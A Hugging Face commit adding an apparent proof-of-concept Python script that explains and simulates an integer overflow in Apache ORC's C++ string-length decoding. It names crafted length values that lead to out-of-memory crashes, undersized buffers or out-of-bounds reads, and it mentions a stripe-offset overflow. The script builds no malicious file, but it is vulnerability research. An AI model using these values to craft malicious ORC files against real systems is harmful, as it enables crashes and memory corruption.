Upload poc_orc_string_overflow.py with huggingface_hub
Browse files- poc_orc_string_overflow.py +67 -0
poc_orc_string_overflow.py
ADDED
|
@@ -0,0 +1,67 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
PoC: Apache ORC String Length Integer Overflow
|
| 4 |
+
===============================================
|
| 5 |
+
|
| 6 |
+
Root cause: ColumnReader.cc:697
|
| 7 |
+
totalLength += static_cast<size_t>(lengths[i]);
|
| 8 |
+
// lengths[i] is int64_t from unsigned RLE decoder — NO negative check
|
| 9 |
+
|
| 10 |
+
String lengths decoded by unsigned RLE (isSigned=false, line 645)
|
| 11 |
+
are stored as int64_t. Values >= 2^63 become negative. static_cast<size_t>
|
| 12 |
+
on negative int64_t produces huge size_t → OOM or wrap-to-zero.
|
| 13 |
+
"""
|
| 14 |
+
import struct
|
| 15 |
+
|
| 16 |
+
def show_overflow() -> None:
    """Print a walkthrough of the ORC string-length integer overflow.

    The function performs no file or ORC I/O. It prints an explanation of
    the issue and then, for a few hard-coded lists of unsigned 64-bit
    lengths, simulates in pure Python how each value looks when
    reinterpreted as a signed 64-bit integer and how the running sum
    behaves under modulo-2**64 arithmetic. A short note about a second,
    related overflow is printed at the end.

    Returns:
        None. All output goes to standard output.
    """
    # Unsigned 64-bit arithmetic wraps modulo 2**64; Python ints do not,
    # so the wraparound is applied by hand.
    u64_modulus = 2**64

    print("ORC StringDirectColumnReader::computeSize() Integer Overflow")
    print("=" * 60)
    print()
    print("Vulnerable code (ColumnReader.cc:691-706):")
    print(" size_t totalLength = 0;")
    print(" for (i = 0; i < numValues; ++i)")
    print(" totalLength += static_cast<size_t>(lengths[i]); // NO CHECK!")
    print()
    print("How negative lengths occur:")
    print(" 1. RLE decoder is unsigned (isSigned=false, line 645)")
    print(" 2. Output stored in int64_t* (line 715-718)")
    print(" 3. uint64 values >= 2^63 become negative int64_t")
    print(" 4. static_cast<size_t>(negative) = huge positive")
    print()

    # Each case: (description, list of unsigned 64-bit length values).
    test_cases = [
        ("OOM DoS: single huge length", [2**63]),
        ("Wrap to 0: two lengths", [2**64 - 1, 1]),
        ("Wrap to 1: crafted pair", [2**64 - 100, 101]),
    ]

    for desc, uint_lengths in test_cases:
        print(f"Case: {desc}")
        total = 0
        for ul in uint_lengths:
            as_size_t = ul % u64_modulus
            # Reinterpret the same 8 bytes as a signed 64-bit integer.
            # An explicit byte order selects the standard 8-byte size, so
            # the result does not depend on the platform's native layout.
            as_int64 = struct.unpack("<q", struct.pack("<Q", as_size_t))[0]
            total = (total + as_size_t) % u64_modulus
            print(f" RLE uint64={ul:#018x} -> int64={as_int64} -> size_t={as_size_t:#018x}")
        print(f" totalLength = {total} ({total:#018x})")
        # Pick the consequence message from the wrapped total. Totals in
        # [1000, 2**40] deliberately print no consequence line.
        if total == 0:
            print(" -> blob.resize(0) -> EMPTY BLOB")
            print(" -> ptr += lengths[i] with negative -> WILD POINTER -> OOB read")
        elif total < 1000:
            print(f" -> blob.resize({total}) -> UNDERSIZED BUFFER")
            print(" -> actual data > blob size -> HEAP CORRUPTION")
        elif total > 2**40:
            print(f" -> blob.resize({total}) -> ALLOCATION FAILURE -> OOM CRASH")
        print()

    print("Additional: Stripe offset overflow (Reader.cc:591)")
    print(" stripeFooterStart = offset + index_length + data_length")
    print(" All uint64 from protobuf, no overflow check")
    print(" -> wraps around -> reads wrong file location")
    print()
    print("ORC C++ has ZERO safe arithmetic in core parsing code")
    print(" Reader.cc: 0 overflow checks in 1830 lines")
    print(" ColumnReader.cc: 0 overflow checks in 1793 lines")
|
| 65 |
+
|
| 66 |
+
if __name__ == "__main__":
    # Run the demonstration only when executed as a script, not on import.
    show_overflow()
|